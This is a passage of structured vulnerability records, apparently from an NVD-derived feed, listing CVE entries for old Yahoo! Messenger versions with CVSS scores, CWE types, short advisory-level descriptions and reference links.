},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/25547"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securityreason.com/securityalert/2809"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securitytracker.com/id?1018204"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/949817"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/24341"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/24354"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1018203"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34758"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://www.exploit-db.com/exploits/4042"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2002-12-31 05:00
Modified
2025-04-03 01:03
Severity ?
Summary
Yahoo! Messenger before February 2002 allows remote attackers to add arbitrary users to another user's buddy list and possibly obtain sensitive information.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://marc.info/?l=bugtraq&m=101439616623230&w=2 | ||
| cve@mitre.org | http://www.cert.org/advisories/CA-2002-16.html | Patch, Third Party Advisory, US Government Resource | |
| cve@mitre.org | http://www.kb.cert.org/vuls/id/393195 | Third Party Advisory, US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | http://marc.info/?l=bugtraq&m=101439616623230&w=2 | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.cert.org/advisories/CA-2002-16.html | Patch, Third Party Advisory, US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.kb.cert.org/vuls/id/393195 | Third Party Advisory, US Government Resource |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger before February 2002 allows remote attackers to add arbitrary users to another user\u0027s buddy list and possibly obtain sensitive information."
}
],
"id": "CVE-2002-1664",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2002-12-31T05:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/393195"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/393195"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2007-08-31 22:17
Modified
2025-04-09 00:30
Severity ?
Summary
Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods. NOTE: some of these details are obtained from third party information.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:*:*:*:*:*:*:*:*",
"matchCriteriaId": "28CF8D81-8299-4EC7-B3A6-E08B57786CB8",
"versionEndIncluding": "8.1.0.413",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in a certain ActiveX control in YVerInfo.dll before 2007.8.27.1 in the Yahoo! services suite for Yahoo! Messenger before 8.1.0.419 allows remote attackers to execute arbitrary code via unspecified vectors involving arguments to the (1) fvCom and (2) info methods. NOTE: some of these details are obtained from third party information."
},
{
"lang": "es",
"value": "Un desbordamiento de b\u00fafer en cierto control ActiveX en YVerInfo.dll versiones anteriores a 2007.8.27.1 en la conjunto de servicios para Yahoo! para Yahoo! Messenger versiones anteriores a 8.1.0.419, permite a atacantes remotos ejecutar c\u00f3digo arbitrario por medio de vectores no especificados que involucran argumentos en los m\u00e9todos (1) fvCom y (2) info. NOTA: algunos de estos datos son obtenidos a partir de informaci\u00f3n de terceros."
}
],
"id": "CVE-2007-4515",
"lastModified": "2025-04-09T00:30:58.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2007-08-31T22:17:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "http://messenger.yahoo.com/security_update.php?id=082907"
},
{
"source": "cve@mitre.org",
"url": "http://osvdb.org/37739"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/26579"
},
{
"source": "cve@mitre.org",
"url": "http://securityreason.com/securityalert/3083"
},
{
"source": "cve@mitre.org",
"url": "http://securitytracker.com/id?1018628"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/25494"
},
{
"source": "cve@mitre.org",
"url": "http://www.vupen.com/english/advisories/2007/3011"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "http://messenger.yahoo.com/security_update.php?id=082907"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/37739"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/26579"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securityreason.com/securityalert/3083"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securitytracker.com/id?1018628"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/25494"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.vupen.com/english/advisories/2007/3011"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36363"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2007-08-31 23:17
Modified
2025-04-09 00:30
Severity ?
Summary
Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe. NOTE: this might be related to CVE-2007-4515. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.209:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9243F4-ADE8-4B7A-A195-EEAD41FF14EA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.402:*:*:*:*:*:*:*",
"matchCriteriaId": "A6CB6D1A-E1A2-4E1C-9E02-24A192D72750",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger 8.1.0.209 and 8.1.0.402 allows remote attackers to cause a denial of service (application crash) via certain file-transfer packets, possibly involving a buffer overflow, as demonstrated by ym8bug.exe. NOTE: this might be related to CVE-2007-4515. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
},
{
"lang": "es",
"value": "Yahoo! Messenger 8.1.0.209 y 8.1.0.402 permite a atacantes remotos provocar una denegaci\u00f3n de servicio (ca\u00edda de aplicaci\u00f3n) mediante determinados paquetes de transferencia de fichero, posiblemente involucrando un desbordamiento de b\u00fafer, como se demuestra con ym8bug.exe.\r\nNOTA: Esto podr\u00eda estar relacionado con CVE-2007-4515.\r\nNOTA: El origen de esta informaci\u00f3n es desconocido; los detalles se han obtenido solamente de informaci\u00f3n de terceros."
}
],
"id": "CVE-2007-4635",
"lastModified": "2025-04-09T00:30:58.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2007-08-31T23:17:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/25484"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/25484"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
},
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2005-05-16 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
The YMSGR URL handler in Yahoo! Messenger 5.x through 6.0 allows remote attackers to cause a denial of service (disconnect) via a room login or a room join request packet with a third : (colon) and an & (ampersand), which causes Messenger to send a corrupted packet to the server, which triggers a disconnect from the server.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
"matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The YMSGR URL handler in Yahoo! Messenger 5.x through 6.0 allows remote attackers to cause a denial of service (disconnect) via a room login or a room join request packet with a third : (colon) and an \u0026 (ampersand), which causes Messenger to send a corrupted packet to the server, which triggers a disconnect from the server."
}
],
"id": "CVE-2005-1618",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2005-05-16T04:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://marc.info/?l=bugtraq\u0026m=111601904204055\u0026w=2"
},
{
"source": "cve@mitre.org",
"url": "http://www.osvdb.org/16816"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/13626"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://marc.info/?l=bugtraq\u0026m=111601904204055\u0026w=2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.osvdb.org/16816"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/13626"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2015-09-11 20:59
Modified
2025-04-12 10:46
Severity ?
Summary
Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:*:*:*:*:*:*:*:*",
"matchCriteriaId": "23A70298-F578-4534-A093-AE997FAB3BFC",
"versionEndIncluding": "11.5.0.228",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file."
},
{
"lang": "es",
"value": "M\u00faltiples desbordamientos de buffer basado en pila en Yahoo! Messenger 11.5.0.228 y versiones anteriores, permite a atacantes remotos causar una denegaci\u00f3n de servicio (colapso) y posiblemente ejecutar c\u00f3digo arbitrario a trav\u00e9s del (1) acceso directo o de (2) las claves de t\u00edtulo en un archivo emoticons.xml."
}
],
"id": "CVE-2014-7216",
"lastModified": "2025-04-12T10:46:40.837",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2015-09-11T20:59:00.100",
"references": [
{
"source": "cve@mitre.org",
"url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
},
{
"source": "cve@mitre.org",
"url": "http://seclists.org/fulldisclosure/2015/Sep/24"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id/1033544"
},
{
"source": "cve@mitre.org",
"url": "https://hackerone.com/reports/10767"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2015/Sep/24"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id/1033544"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://hackerone.com/reports/10767"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2007-09-20 21:17
Modified
2025-04-09 00:30
Severity ?
Summary
Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.421:*:*:*:*:*:*:*",
"matchCriteriaId": "661E07A2-FB77-4411-95B3-BD0ED72DC6B3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method."
},
{
"lang": "es",
"value": "Vulnerabilidad de escalado de rutas absolutas en ciertos controles de ActiveX en el objeto CYFT del ft60.dll del Yahoo! Messenger 8.1.0.421 permite a atacantes remotos forzar una descarga y crear o sobrescribir ficheros de su elecci\u00f3n a trav\u00e9s de un nombre de ruta completa como segundo argumento del m\u00e9todo GetFile."
}
],
"id": "CVE-2007-5017",
"lastModified": "2025-04-09T00:30:58.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2007-09-20T21:17:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://osvdb.org/38296"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/25727"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1018715"
},
{
"source": "cve@mitre.org",
"url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
},
{
"source": "cve@mitre.org",
"url": "https://www.exploit-db.com/exploits/4428"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/38296"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/25727"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1018715"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://www.exploit-db.com/exploits/4428"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2009-12-02 19:30
Modified
2025-04-09 00:30
Severity ?
Summary
An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:9.0.0.2162:*:*:*:*:*:*:*",
"matchCriteriaId": "6A1FEC40-A9EA-44AF-9DF3-1F85E1DDE4FF",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An ActiveX control in YahooBridgeLib.dll for Yahoo! Messenger 9.0.0.2162, and possibly other 9.0 versions, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) by calling the RegisterMe method with a long argument."
},
{
"lang": "es",
"value": "Un control ActiveX en YahooBridgeLib.dll para Yahoo! Messenger v9.0.0.2162, y posiblemente otras versiones 9.0, permite a atacantes remotos producir una denegaci\u00f3n de servicio (desreferencia a un puntero NULL y ca\u00edda de aplicaci\u00f3n ) mediante una llamada al m\u00e9todo RegisterMe con un argumento largo."
}
],
"id": "CVE-2009-4171",
"lastModified": "2025-04-09T00:30:58.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2009-12-02T19:30:00.250",
"references": [
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/37007"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/507818/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/37007"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54263"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2002-12-31 05:00
Modified
2025-04-03 01:03
Severity ?
Summary
The installer in Yahoo! Messenger 4.0, 5.0 and 5.5 does not verify package signatures which could allow remote attackers to install trojan programs via DNS spoofing.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:4.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4A5FAAEB-793F-405B-A8D9-872FCEEBFB55",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The installer in Yahoo! Messenger 4.0, 5.0 and 5.5 does not verify package signatures which could allow remote attackers to install trojan programs via DNS spoofing."
}
],
"id": "CVE-2002-2361",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2002-12-31T05:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00384.html"
},
{
"source": "cve@mitre.org",
"url": "http://www.iss.net/security_center/static/9984.php"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/5579"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://cert.uni-stuttgart.de/archive/bugtraq/2002/08/msg00384.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.iss.net/security_center/static/9984.php"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/5579"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-264"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2007-07-10 00:30
Modified
2025-04-09 00:30
Severity ?
Summary
Buffer overflow in Yahoo! Messenger 8.1 allows user-assisted remote authenticated users, who are listed in an address book, to execute arbitrary code via unspecified vectors, aka ZD-00000005. NOTE: this information is based upon a vague advisory by a vulnerability information sales organization that does not coordinate with vendors or release actionable advisories. A CVE has been assigned for tracking purposes, but duplicates with other CVEs are difficult to determine.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1:*:*:*:*:*:*:*",
"matchCriteriaId": "21EC84BF-CDEB-4046-8736-C77C007D368B",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
